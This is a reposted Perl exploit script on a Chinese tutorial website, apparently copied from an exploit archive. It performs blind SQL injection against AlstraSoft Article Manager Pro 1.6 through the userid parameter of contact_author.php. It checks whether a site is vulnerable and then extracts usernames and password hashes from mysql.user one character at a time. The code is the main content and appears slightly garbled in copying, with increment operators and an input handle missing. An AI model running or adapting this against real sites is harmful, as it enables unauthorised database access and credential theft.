手机
当前位置:查字典教程网 >电脑 >电脑安全教程 >AlstraSoft Article Manager Pro 1.6 Blind SQL Injection Exploit
AlstraSoft Article Manager Pro 1.6 Blind SQL Injection Exploit
摘要:#/usr/bin/perl#||Author:GoLd_M#--//-->#--AlstraSoftArticleManagerProBl...

#/usr/bin/perl

#| | Author: GoLd_M

#--//-->

# -- AlstraSoft Article Manager Pro Blind SQL Injection Exploit --

#--//--> Exploit :

use strict;

use LWP::Simple;print "- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -n";

print "- AlstraSoft Article Manager Pro Blind SQL Injection Exploit -n";

print " GoLd_M Mahmood_ali Tryag.cc/cc n";

print " - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -n";print "nEnter URL (ie: ): ";

chomp(my $url=);if(inject_test($url)) {

print "Injecting.. Please Wait this could take several minutes..nn";

my $details = blind($url);

print "Exploit Success! Admin Details: ".$details;

exit;

}sub blind {my $url = shift;

my $res = undef;

my $chr = 48;

my $substr = 1;

my $done = 1;while($done) {

my $content = get($url."/contact_author.php?userid=1) and ascii(substring((SELECT CONCAT(username,0x3a,password,0x5E) FROM

mysql.user),".$substr.",1))=".$chr."/*");if($content =~ /Previous/ && $chr == 94) { $done = 0; }

elsif($content =~ /Previous/) { $res .= chr($chr); $substr ; $chr = 48; }

else { $chr ; }

}

return $res;

}sub inject_test {my $url = shift;

my $true = get($url."/contact_author.php?userid=1) and 1=1 /*");

my $false = get($url."/contact_author.php?userid=1) and 1=2 /*");if($true =~ /Previous/ && $false !~ /Previous/) {

print "nTarget Site Vulnerable!nn";

return 1;

} else { print "nTarget Site Not Vulnerable! Exiting..n"; exit; }

}

【AlstraSoft Article Manager Pro 1.6 Blind SQL Injection Exploit】相关文章:

密码遗忘通关手册 减少不必要的麻烦

eNdonesia 8.4 (Calendar Module) Remote SQL Injection Exploit

CoolPlayer m3u File Local Buffer Overflow Exploit

MojoAuto (mojoAuto.cgi mojo) Blind SQL Injection Exploit

BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (py)

MojoPersonals (mojoClassified.cgi mojo) Blind SQL Injection Exploit

PHP木马大全 一句话的PHP木马的防范

Arctic Issue Tracker 2.0.0 (index.php filter) SQL Injection Exploit

APK在线检测杀毒推荐网址

Oracle Internet Directory 10.1.4 Remote Preauth DoS Exploit

精品推荐
分类导航